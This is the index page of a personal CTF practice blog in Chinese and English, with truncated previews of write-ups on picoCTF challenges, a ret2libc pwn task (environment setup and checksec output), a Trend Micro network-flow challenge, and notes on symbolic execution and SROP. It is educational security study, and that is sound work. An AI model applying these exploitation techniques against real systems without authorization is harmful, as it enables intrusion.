Just a Blog by Sharkkcode ... 紀錄，也是一種享受生活的方式 XD

what's a net cat? 連線

Magikarp Ground Mission 用題目給的 password 進到 server 內部 根據線索把 flag 接起來

Wave a flag 觀察檔案 1$ file ./warm 發現是一個可執行檔。 執行 1$ ./warm 1Hello user! Pass me a -h to learn what I can do! 1$ ./warm -h

Obedient Cat 1$ cat flag

2019 Trendmicro CTF Wildcard 400 這篇文章是我練習 2019 Trendmicro CTF Wildcard 400 這個題目時紀錄的解題筆記，我把一些參考資源放在文章最後面。 Permise ( 前情提要 ) ​You are a network security administrator for the medium sized business XYZcorp. You often use network flow data to uncover anomalous security events. This challenge provides some sample aggregated data on flows, and uses answers from the anomalous ( 反常的 ) events to construct the flag. Knowledge of network security or protocols is not required. This challenge requires data ...

Here's a LIBC Given 3 files : vuln , libc.so.6 , Makefile Environment set up Use pwninit to set up the enviroment. We got ld-2.27.so . Patch vuln with ld-2.27.so . Analyze vuln file : 1234ELF 64-bit LSB executabledynamically linkedinterpreter ./ld-2.27.sonot stripped checksec : 123456Arch: amd64-64-littleRELRO: Partial RELROStack: No canary foundNX: NX enabledPIE: No PIE (0x400000)RUNPATH: b'./' A loop in main : 1234500400896 b8 00 MOV EAX,0x0 ...

Information Given 1 file : cat.jpg Analyze cat.jpg Use exiftool to analyze cat.jpg : 1exiftool ./cat.jpg Found a string cGljb0NURnt0aGVfbTN0YWRhdGFfMXNfbW9kaWZpZWR9 . Base64 decode and get the Flag 1echo "cGljb0NURnt0aGVfbTN0YWRhdGFfMXNfbW9kaWZpZWR9" | base64 -d

Python Wrangling Given 3 files : ende.py , flag.txt.en , pw.txt Analyze ende.py : 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950import sysimport base64from cryptography.fernet import Fernetusage_msg = "Usage: "+ sys.argv[0] +" (-e/-d) [file]"help_msg = usage_msg + "\n" +\ "Examples:\n" +\ " To decrypt a file named 'pole.txt', do: " +\ "'$ python "+ sys.a ...

Symbolic Execution Note finding bugs, symbolic execution, EXE Bugs Major source of security exploits. Bugs ~ Exploit maybe hard, but should assume it is possible e.g., not buffer overrun is an exploit, but it maybe possible to exploit Approaches To Finding Bugs Verification : eliminate classes of bugs Testing : known bugs Fuzzing : unknown bugs Symbolic Execution 可能的情境 Bugs 可能的類型： Crash Divide By Zero Null Pointer Reference Array Out-Of-Bound App Specific Goal : Find Deep Bugs Ide ...

SROP Note SROP Sigreturn-Oriented Programming Signal 機制 Signal 機制 (軟中斷訊號、軟中斷) 是類 UNIX 系統中 process 之間相互傳遞信息的一種方法。比方說： process 之間可以通過 system 調用 kill 來發送值軟中斷信號。 信號機制常見步驟： 步驟 1 ： Kernel 向某 process 發送 signal 機制，該 process 會暫時被 hang (掛起) ，進入 kernel 態。 步驟 2 ： Kernel 會為該 process 保存一些資訊，會把以下資訊壓入 stack 中： 所有 register 值。 Signal 信息。 指向 sigreturn 的系統調用位址。 此部分是在 user process 的 address area 。 之後會跳轉到 Signal Handler 中處理相應的 signal 。 Signal Frame 會因為架構的不同而不同。 步驟 3 ： 當 Signal Handler 執行完之後， Signal Handler 返 ...